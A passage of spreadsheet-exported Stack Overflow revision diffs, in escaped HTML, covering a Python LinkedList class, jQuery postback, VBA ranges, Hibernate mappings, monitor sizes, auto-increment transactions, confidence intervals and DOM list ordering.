    def __nonzero__(self): return &lt;span class="diff-add"&gt;True&lt;/span&gt;_x000D_
_x000D_
    def __len__(self):_x000D_
        return &lt;span class="diff-add"&gt;sum(1&lt;/span&gt; &lt;span class="diff-add"&gt;for&lt;/span&gt; &lt;span class="diff-add"&gt;_&lt;/span&gt; &lt;span class="diff-add"&gt;in&lt;/span&gt; self)_x000D_
_x000D_
    def __add__(self, other):_x000D_
        other = LinkedList(other)_x000D_
_x000D_
        if not self: return other   # () + l = l_x000D_
        start=l = LinkedList(self)  # Create copy, as we'll mutate_x000D_
_x000D_
        while l:_x000D_
            if not l._tail: # Last element?_x000D_
                l._tail = other_x000D_
                break_x000D_
            l = l._tail_x000D_
        return start_x000D_
_x000D_
    def __radd__(self, other):_x000D_
        return LinkedList(other) + self_x000D_
_x000D_
    def __iter__(self):_x000D_
        x=self_x000D_
        while x:_x000D_
            yield x.head_x000D_
            x=x.tail_x000D_
_x000D_
    def __getitem__(self, idx):_x000D_
        """Get item at specified index"""_x000D_
        if isinstance(idx, slice):_x000D_
            # Special case: Avoid constructing a new list, or performing O(n) length _x000D_
            #&lt;span class="diff-add"&gt; calculation&lt;/span&gt; for slices like l[3:].  Since we're immutable, just return&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;            &lt;span class="diff-add"&gt;#&lt;/span&gt; &lt;span class="diff-add"&gt;the&lt;/span&gt; &lt;span class="diff-add"&gt;appropriate&lt;/span&gt; &lt;span class="diff-add"&gt;node.&lt;/span&gt; &lt;span class="diff-add"&gt;This&lt;/span&gt; &lt;span class="diff-add"&gt;becomes&lt;/span&gt; O(start) rather than O(n)&lt;span class="diff-add"&gt;.&lt;/span&gt;_x000D_
            # We can't do this for  more complicated slices however&lt;span class="diff-add"&gt; (eg [l:4]&lt;/span&gt;_x000D_
            start = idx.start or 0_x000D_
            if (start &amp;gt;= 0) and (idx.stop is None) and (idx.step is None or idx.step == 1):_x000D_
                no_copy_needed=True_x000D_
            else:_x000D_
                length = len(self)  # Need to calc length._x000D_
                start, stop, step = idx.indices(length)_x000D_
                no_copy_needed = (stop == length) and (step == 1)_x000D_
_x000D_
            if no_copy_needed:_x000D_
                l = self_x000D_
                for i in range(start): &lt;span class="diff-add"&gt;_x000D_
                    if not l: break # End of list._x000D_
                    &lt;/span&gt;l=l.tail_x000D_
                return l_x000D_
            else:_x000D_
                # We need to construct a new list._x000D_
                &lt;span class="diff-add"&gt;if step &amp;lt; 1:  # Need to instantiate list to deal with -ve step_x000D_
                    return LinkedList(list(self)[start:stop:step])_x000D_
                else:_x000D_
                    &lt;/span&gt;return LinkedList(itertools.islice(iter(self), start, stop, step))_x000D_
        else:       _x000D_
            # Non-slice index._x000D_
            if idx &amp;lt; 0: idx = len(self)+idx_x000D_
            if &lt;span class="diff-add"&gt;not&lt;/span&gt; &lt;span class="diff-add"&gt;self&lt;/span&gt;: raise IndexError("list index out of range")_x000D_
            if idx == 0: return self.head_x000D_
            return self.tail[idx-1]_x000D_
_x000D_
    def __mul__(self, n):_x000D_
        if n &amp;lt;= 0: return &lt;span class="diff-add"&gt;Nil&lt;/span&gt;_x000D_
        l=self_x000D_
        for i in range(n-1): l += self_x000D_
        return l_x000D_
    def __rmul__(self, n): return self * n_x000D_
_x000D_
    # &lt;span class="diff-add"&gt;Ideally&lt;/span&gt; &lt;span class="diff-add"&gt;we&lt;/span&gt; &lt;span class="diff-add"&gt;should&lt;/span&gt; &lt;span class="diff-add"&gt;compute&lt;/span&gt; &lt;span class="diff-add"&gt;the&lt;/span&gt; &lt;span class="diff-add"&gt;has&lt;/span&gt; &lt;span class="diff-add"&gt;ourselves&lt;/span&gt; &lt;span class="diff-add"&gt;rather&lt;/span&gt; &lt;span class="diff-add"&gt;than&lt;/span&gt; &lt;span class="diff-add"&gt;construct&lt;/span&gt;_x000D_
    # &lt;span class="diff-add"&gt;a&lt;/span&gt; &lt;span class="diff-add"&gt;temporary&lt;/span&gt; &lt;span class="diff-add"&gt;tuple&lt;/span&gt; as &lt;span class="diff-add"&gt;below.&lt;/span&gt;  &lt;span class="diff-add"&gt;I&lt;/span&gt; &lt;span class="diff-add"&gt;haven't&lt;/span&gt; &lt;span class="diff-add"&gt;impemented&lt;/span&gt; &lt;span class="diff-add"&gt;this&lt;/span&gt; &lt;span class="diff-add"&gt;here&lt;/span&gt;_x000D_
    def __hash__(self): return hash(tuple(self))_x000D_
&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;    def &lt;span class="diff-add"&gt;__eq__&lt;/span&gt;(self, other): return &lt;span class="diff-add"&gt;self._cmp&lt;/span&gt;(&lt;span class="diff-add"&gt;other) == 0_x000D_
    def __ne__(&lt;/span&gt;self&lt;span class="diff-add"&gt;, other&lt;/span&gt;)&lt;span class="diff-add"&gt;:&lt;/span&gt; &lt;span class="diff-add"&gt;return&lt;/span&gt; &lt;span class="diff-add"&gt;not self == &lt;/span&gt;other_x000D_
    def &lt;span class="diff-add"&gt;__lt__&lt;/span&gt;(self, other): return &lt;span class="diff-add"&gt;self._cmp(other) &amp;lt; 0_x000D_
    def __gt__&lt;/span&gt;(self&lt;span class="diff-add"&gt;, other&lt;/span&gt;)&lt;span class="diff-add"&gt;:&lt;/span&gt; &lt;span class="diff-add"&gt;return&lt;/span&gt; &lt;span class="diff-add"&gt;self._cmp(&lt;/span&gt;other&lt;span class="diff-add"&gt;) &amp;gt; 0&lt;/span&gt;_x000D_
    def __le__(self, other): return self&lt;span class="diff-add"&gt;._cmp(other&lt;/span&gt;) &amp;lt;= &lt;span class="diff-add"&gt;0&lt;/span&gt;_x000D_
    def __ge__(self, other): return self&lt;span class="diff-add"&gt;._cmp(other&lt;/span&gt;) &amp;gt;=&lt;span class="diff-add"&gt; 0_x000D_
_x000D_
    def&lt;/span&gt; &lt;span class="diff-add"&gt;_cmp(self, &lt;/span&gt;other&lt;span class="diff-add"&gt;):_x000D_
        """Acts as cmp(): -1 for self&amp;lt;other, 0 for equal, 1 for greater"""_x000D_
        if not isinstance(other, LinkedList):_x000D_
            return cmp(LinkedList,type(other))  # Arbitrary ordering._x000D_
_x000D_
        A, B = iter(self), iter(other)_x000D_
        for a,b in itertools.izip(A,B):&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;    &lt;/span&gt;       &lt;span class="diff-add"&gt;if a&amp;lt;b: return&lt;/span&gt; &lt;span class="diff-add"&gt;-1_x000D_
           elif a &amp;gt; b: return 1_x000D_
_x000D_
        try:_x000D_
            A.next()_x000D_
            return 1  # a has more items._x000D_
        except StopIteration: pass_x000D_
_x000D_
        try:_x000D_
            B.next()_x000D_
            return -1  # b has more items._x000D_
        except StopIteration: pass_x000D_
_x000D_
        return 0  # Lists are equal_x000D_
&lt;/span&gt;_x000D_
    def __repr__(self):_x000D_
        return "LinkedList([%s])" % ', '.join(map(repr,self))_x000D_
&lt;span class="diff-add"&gt;_x000D_
class EmptyList(LinkedList):_x000D_
    """A singleton representing an empty list."""_x000D_
    def __new__(cls):_x000D_
        return object.__new__(cls)_x000D_
_x000D_
    def __iter__(self): return iter([])_x000D_
    def __nonzero__(self): return False_x000D_
_x000D_
    @property_x000D_
    def head(self): raise IndexError("End of list")_x000D_
_x000D_
    @property_x000D_
    def tail(self): raise IndexError("End of list")_x000D_
_x000D_
# Create EmptyList singleton_x000D_
LinkedList.EmptyList = EmptyList()_x000D_
del EmptyList_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Brian</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; As the title suggests, I am having trouble maintaining my code on postback. I have a bunch of jQuery code in the &lt;span class="diff-delete"&gt; section&lt;/span&gt; and this works fine until a postback occurs after which it ceases to function!&lt;/p&gt; _x000D_
 &lt;p&gt; How can I fix this? Does the &lt;span class="diff-delete"&gt; not&lt;/span&gt; get read on postback, and is there a way in which I can force this to happen?&lt;/p&gt; _x000D_
 &lt;p&gt; JavaScript is:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;        &amp;lt;script type="text/javascript"&amp;gt;_x000D_
        $(document).ready(function()_x000D_
        {_x000D_
            $('.tablesorter tbody tr').tablesorter();_x000D_
_x000D_
        $('.tablesearch tbody tr').quicksearch({_x000D_
            position: 'before',_x000D_
            attached: 'table.tablesearch',_x000D_
            stripeRowClass: ['odd', 'even'],_x000D_
            labelText: 'Search:',_x000D_
            delay: 100_x000D_
        });_x000D_
       }); _x000D_
        &amp;lt;/script&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Thanks in advance :)&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; As the title suggests, I am having trouble maintaining my code on postback. I have a bunch of jQuery code in the &lt;span class="diff-add"&gt;Head section&lt;/span&gt; and this works fine until a postback occurs after which it ceases to function!&lt;/p&gt; _x000D_
 &lt;p&gt; How can I fix this? Does the &lt;span class="diff-add"&gt;head not&lt;/span&gt; get read on postback, and is there a way in which I can force this to happen?&lt;/p&gt; _x000D_
 &lt;p&gt; JavaScript is:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;        &amp;lt;script type="text/javascript"&amp;gt;_x000D_
        $(document).ready(function()_x000D_
        {_x000D_
            $('.tablesorter tbody tr').tablesorter();_x000D_
_x000D_
        $('.tablesearch tbody tr').quicksearch({_x000D_
            position: 'before',_x000D_
            attached: 'table.tablesearch',_x000D_
            stripeRowClass: ['odd', 'even'],_x000D_
            labelText: 'Search:',_x000D_
            delay: 100_x000D_
        });_x000D_
       }); _x000D_
        &amp;lt;/script&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Thanks in advance :)&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Damien</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt;
                            &lt;p&gt; let's say I have a excel spread sheet like below:&lt;/p&gt;
&lt;h2&gt;&lt;span class="diff-delete"&gt;col1   col2&lt;/span&gt;&lt;/h2&gt;&lt;span class="diff-delete"&gt;
&lt;/span&gt;&lt;p&gt;&lt;span class="diff-delete"&gt; ?????????
?????????
?????????
?????????
??????????
??????????
??????????&lt;/span&gt;&lt;/p&gt;
&lt;p&gt; I want to return a range of cells (dog1,dog2,dog3,dog4) or (cat1,cat2,cat3) based on either "dog" or "cat"&lt;/p&gt;
&lt;p&gt; I know I can do a loop to check one by one, but is there any other method in VBA so I can "filter" the result in one shot?&lt;/p&gt;
&lt;p&gt; maybe the Range.Find(XXX) can help, but I only see examples for just one cell not a range of cells.&lt;/p&gt;
&lt;p&gt; Please advice&lt;/p&gt;
&lt;p&gt; Regards&lt;/p&gt;
                        &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt;
                            &lt;p&gt; let's say I have a excel spread sheet like below:&lt;/p&gt;
&lt;pre class="lang-vb s-code-block hljs vbnet"&gt;&lt;code&gt;&lt;span class="diff-add"&gt;col1   col2
------------
?????????
?????????
?????????
?????????
??????????
??????????
??????????
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt; I want to return a range of cells (dog1,dog2,dog3,dog4) or (cat1,cat2,cat3) based on either "dog" or "cat"&lt;/p&gt;
&lt;p&gt; I know I can do a loop to check one by one, but is there any other method in VBA so I can "filter" the result in one shot?&lt;/p&gt;
&lt;p&gt; maybe the Range.Find(XXX) can help, but I only see examples for just one cell not a range of cells.&lt;/p&gt;
&lt;p&gt; Please advice&lt;/p&gt;
&lt;p&gt; Regards&lt;/p&gt;
                        &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;set name="auditRecords" table="TransferAuditRecord" inverse="false" cascade="save-update"&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;  &lt;/span&gt;  &amp;lt;key&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;  &lt;/span&gt;    &amp;lt;column name="AuditRecordID" not-null="true" /&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;  &lt;/span&gt;  &amp;lt;/key&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;  &lt;/span&gt;  &amp;lt;one-to-many class="audit.AuditRecord"/&amp;gt;_x000D_
&lt;span class="diff-delete"&gt;  &lt;/span&gt;&amp;lt;/set&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;many-to-one name="parentAuditRecord" lazy="false"_x000D_
            column="parent_id"_x000D_
            class="audit.AuditRecord"_x000D_
            cascade="all" /&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;AuditRecord auditRecord = new AuditRecord();_x000D_
auditRecord.setUser(userDAO.findById(org.springframework.security.context.SecurityContextHolder.getContext().getAuthentication().getName()));_x000D_
_x000D_
auditRecord.setParentAuditRecord(getCurrentActiveServiceRecord());_x000D_
_x000D_
auditable.getAuditRecords().add(auditRecord);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;msg=... + ((AuditRecord) balance.getAuditRecords().toArray()[getAuditRecords().size()-1]).getParentAuditRecord().getAuditRecordType().getDescription() + ...;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;set name="auditRecords" table="TransferAuditRecord" inverse="false" cascade="save-update"&amp;gt;_x000D_
  &amp;lt;key&amp;gt;_x000D_
    &amp;lt;column name="AuditRecordID" not-null="true" /&amp;gt;_x000D_
  &amp;lt;/key&amp;gt;_x000D_
  &amp;lt;one-to-many class="audit.AuditRecord"/&amp;gt;_x000D_
&amp;lt;/set&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;many-to-one name="parentAuditRecord" lazy="false"_x000D_
&lt;span class="diff-add"&gt; &lt;/span&gt;            column="parent_id"_x000D_
&lt;span class="diff-add"&gt; &lt;/span&gt;            class="audit.AuditRecord"_x000D_
&lt;span class="diff-add"&gt; &lt;/span&gt;            cascade="all" /&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;AuditRecord auditRecord = new AuditRecord();_x000D_
auditRecord.setUser(userDAO.findById(&lt;span class="diff-add"&gt;_x000D_
    &lt;/span&gt;org.springframework.security.context.SecurityContextHolder.getContext()&lt;span class="diff-add"&gt;_x000D_
        &lt;/span&gt;.getAuthentication().getName()));_x000D_
_x000D_
auditRecord.setParentAuditRecord(getCurrentActiveServiceRecord());_x000D_
_x000D_
auditable.getAuditRecords().add(auditRecord);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;msg=... + ((AuditRecord) balance.getAuditRecords().toArray()[getAuditRecords().size()-1])&lt;span class="diff-add"&gt;_x000D_
    &lt;/span&gt;.getParentAuditRecord().getAuditRecordType().getDescription() + ...;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>user36670</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; If you don't care for accuracy, best-practice, relevance, or code quality then&lt;/span&gt; I would start with reading C# online tutorials and articles from &lt;a href="http://www.codeproject.com" rel="nofollow noreferrer"&gt;Code Project&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I would start with reading C# online tutorials and articles from &lt;a href="http://www.codeproject.com" rel="nofollow noreferrer"&gt;Code Project&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I am thinking about adding a third monitor to my coding station.&lt;/p&gt; _x000D_
 &lt;p&gt; I currently run 1600x1200 on a dell 20.1", which is ok, but I am thinking to move to something that will do 1920x1200.&lt;/p&gt; _x000D_
 &lt;p&gt; I'm doing the purchase on eBay, so can't really see the monitor beforehand.&lt;/p&gt; _x000D_
 &lt;p&gt; Last time I bought a "Widescreen" (I read "ShortScreen") monitor, I hated it. In real space, I gained a couple inches width, but I lost a lot off the height. It was like getting my monitor cut in half.&lt;/p&gt; _x000D_
 &lt;p&gt; I'm looking at the Dell 24" or a SOYO 26". I want to make sure that the height of the screen isn't less than what I have now, in actual inches, so that the 1200 I get will be the same as the 1200 I have now, and it will just be like adding an extra 320px to the side of my existing monitor.&lt;/p&gt; _x000D_
 &lt;p&gt; Most of the monitors I have looked at include the HxWxD, but it's for the whole thing, including sides, stand, etc. For the life of me, I can't seem to find an actual measure of screen height and width, other than diagonal, which could be anything, depending on the diagonal angle.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Does anyone have experience with the Dell 24" 248WFP or the Soyo Pearl 26", or have any idea on a resource that would show how TALL the screen is or square inches?&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; At this point, I'd be happy if someone could just measure their screen height with a ruler for me =o)&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I am thinking about adding a third monitor to my coding station.&lt;/p&gt; _x000D_
 &lt;p&gt; I currently run 1600x1200 on a dell 20.1", which is ok, but I am thinking to move to something that will do 1920x1200.&lt;/p&gt; _x000D_
 &lt;p&gt; I'm doing the purchase on eBay, so can't really see the monitor beforehand.&lt;/p&gt; _x000D_
 &lt;p&gt; Last time I bought a "Widescreen" (I read "ShortScreen") monitor, I hated it. In real space, I gained a couple inches width, but I lost a lot off the height. It was like getting my monitor cut in half.&lt;/p&gt; _x000D_
 &lt;p&gt; I'm looking at the Dell 24" or a SOYO 26". I want to make sure that the height of the screen isn't less than what I have now, in actual inches, so that the 1200 I get will be the same as the 1200 I have now, and it will just be like adding an extra 320px to the side of my existing monitor.&lt;/p&gt; _x000D_
 &lt;p&gt; Most of the monitors I have looked at include the HxWxD, but it's for the whole thing, including sides, stand, etc. For the life of me, I can't seem to find an actual measure of screen height and width, other than diagonal, which could be anything, depending on the diagonal angle.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Does anyone have experience with the Dell 24" 248WFP or the Soyo Pearl 26", or have any idea on a resource that would show how TALL the screen is or square inches?&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; At this point, I'd be happy if someone could just measure their screen height with a ruler for me =o)&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; EDIT:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Seriously? The guy who wrote the post about Job Hopping Etiquette:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;a href="http://stackoverflow.com/questions/48618/job-hopping-etiquette"&gt;&lt;span class="diff-add"&gt;http://stackoverflow.com/questions/48618/job-hopping-etiquette&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; felt the need to close my question because he doesn't think my monitor, on which I do all of my programming, which is the window into the world in which I work, doing my programming, is programming related?&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Who here thinks that your programming tools have nothing to do with programming - anyone want to try coding on the 6" monitors they have at the supermarket checkout stand?&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>JJJ</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; If you think about it, the auto-increment number &lt;strong&gt;should not&lt;/strong&gt; be transactional. &lt;span class="diff-delete"&gt;If&lt;/span&gt; other transactions had to wait to see if the auto-number was going to be used or "rolled back", they would be blocked by the existing transaction using the auto-number. &lt;span class="diff-delete"&gt;For&lt;/span&gt; example, consider my &lt;span class="diff-delete"&gt;pseudo&lt;/span&gt; code below with table A using an auto-number field for the ID column:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;User 1_x000D_
------------_x000D_
begin transaction_x000D_
&lt;span class="diff-delete"&gt;   &lt;/span&gt;insert into A ..._x000D_
&lt;span class="diff-delete"&gt;   &lt;/span&gt;insert into B ..._x000D_
&lt;span class="diff-delete"&gt;   &lt;/span&gt;update C ..._x000D_
&lt;span class="diff-delete"&gt;   &lt;/span&gt;insert into D ..._x000D_
commit_x000D_
_x000D_
_x000D_
User 2_x000D_
-----------_x000D_
begin transaction_x000D_
&lt;span class="diff-delete"&gt;   &lt;/span&gt;insert into A ..._x000D_
&lt;span class="diff-delete"&gt;   &lt;/span&gt;insert into B ..._x000D_
commit_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; If user 2's transaction starts a millisecond after user 1's, then their insert into table A would have to wait for user 1's entire transaction to complete just to see if the auto-number from the first insert into A was used.&lt;/p&gt; _x000D_
 &lt;p&gt; This is a feature, not a bug. &lt;span class="diff-delete"&gt;I&lt;/span&gt; would recommend using another scheme to generate auto-numbers if you need them to be tightly sequential.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; If you think about it, the auto-increment number &lt;strong&gt;should not&lt;/strong&gt; be transactional. &lt;span class="diff-add"&gt; If&lt;/span&gt; other transactions had to wait to see if the auto-number was going to be used or "rolled back", they would be blocked by the existing transaction using the auto-number. &lt;span class="diff-add"&gt; For&lt;/span&gt; example, consider my &lt;span class="diff-add"&gt;psuedo&lt;/span&gt; code below with table A using an auto-number field for the ID column:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;User 1_x000D_
------------_x000D_
begin transaction_x000D_
insert into A ..._x000D_
insert into B ..._x000D_
update C ..._x000D_
insert into D ..._x000D_
commit_x000D_
_x000D_
_x000D_
User 2_x000D_
-----------_x000D_
begin transaction_x000D_
insert into A ..._x000D_
insert into B ..._x000D_
commit_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; If user 2's transaction starts a millisecond after user 1's, then their insert into table A would have to wait for user 1's entire transaction to complete just to see if the auto-number from the first insert into A was used.&lt;/p&gt; _x000D_
 &lt;p&gt; This is a feature, not a bug. &lt;span class="diff-add"&gt; I&lt;/span&gt; would recommend using another scheme to generate auto-numbers if you need them to be tightly sequential.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Jason Jackson</t>
  </si>
  <si>
    <t>Aiyoub</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; In particular, it's possible to do this knowing only the number of data points, the sum, and the sum of the squares of the datapoints.&lt;/p&gt; _x000D_
 &lt;p&gt; For large &lt;code&gt;n&lt;/code&gt; (probably anything above 30), it's safe to assume, by the central limit theorem, that the distribution of the sample mean is normal (gaussian) but I'd like a procedure that gives a confidence interval for any &lt;code&gt;n&lt;/code&gt;. My understanding is that the way to do that is to use a Student T distribution with &lt;code&gt;n-1&lt;/code&gt; degrees of freedom. (I hate to bias answers too much, but I figure it's good for all the likely keywords to show up here.)&lt;/p&gt; _x000D_
 &lt;p&gt; Answers can just give an expression for delta where the confidence interval is taken to be&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;[a&lt;/span&gt; - delta, &lt;span class="diff-delete"&gt;a&lt;/span&gt; + delta]._x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Give &lt;code&gt;delta&lt;/code&gt; in terms of&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;n: the number of data points_x000D_
&lt;span class="diff-delete"&gt;a&lt;/span&gt;: the &lt;span class="diff-delete"&gt;mean&lt;/span&gt; of the data points_x000D_
q: the sum of the squares of the data points_x000D_
c: the confidence level, in (0,1)_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; In particular, it's possible to do this knowing only the number of data points, the sum, and the sum of the squares of the datapoints.&lt;/p&gt; _x000D_
 &lt;p&gt; For large &lt;code&gt;n&lt;/code&gt; (probably anything above 30), it's safe to assume, by the central limit theorem, that the distribution of the sample mean is normal (gaussian) but I'd like a procedure that gives a confidence interval for any &lt;code&gt;n&lt;/code&gt;. My understanding is that the way to do that is to use a Student T distribution with &lt;code&gt;n-1&lt;/code&gt; degrees of freedom. (I hate to bias answers too much, but I figure it's good for all the likely keywords to show up here.)&lt;/p&gt; _x000D_
 &lt;p&gt; Answers can just give an expression for delta where the confidence interval is taken to be&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;[s/n&lt;/span&gt; - delta, &lt;span class="diff-add"&gt;s/n&lt;/span&gt; + delta]._x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Give &lt;code&gt;delta&lt;/code&gt; in terms of&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;n: the number of data points_x000D_
&lt;span class="diff-add"&gt;s&lt;/span&gt;: the &lt;span class="diff-add"&gt;sum&lt;/span&gt; of the data points_x000D_
q: the sum of the squares of the data points_x000D_
c: the confidence level, in (0,1)_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>dreeves</t>
  </si>
  <si>
    <t>David Nehme</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;p&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;Possible Duplicate:&lt;/span&gt;&lt;/strong&gt;&lt;br&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;a href="http://stackoverflow.com/questions/5066925/javascript-only-sort-a-bunch-of-divs"&gt;&lt;span class="diff-delete"&gt;Javascript only - sort a bunch of DIVs&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; If I have a list like this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;ul id="mylist"&amp;gt;_x000D_
    &amp;lt;li id="list-item1"&amp;gt;text 1&amp;lt;/li&amp;gt;_x000D_
    &amp;lt;li id="list-item2"&amp;gt;text 2&amp;lt;/li&amp;gt;_x000D_
    &amp;lt;li id="list-item3"&amp;gt;text 3&amp;lt;/li&amp;gt;_x000D_
    &amp;lt;li id="list-item4"&amp;gt;text 4&amp;lt;/li&amp;gt;_x000D_
&amp;lt;/ul&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; What's the easiest way to re-arrange the DOM nodes to my preference? (This needs to happen automatically when the page loads, the list-order preference is gained from a cookie)&lt;/p&gt; _x000D_
 &lt;p&gt; E.g.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;ul id="mylist"&amp;gt;_x000D_
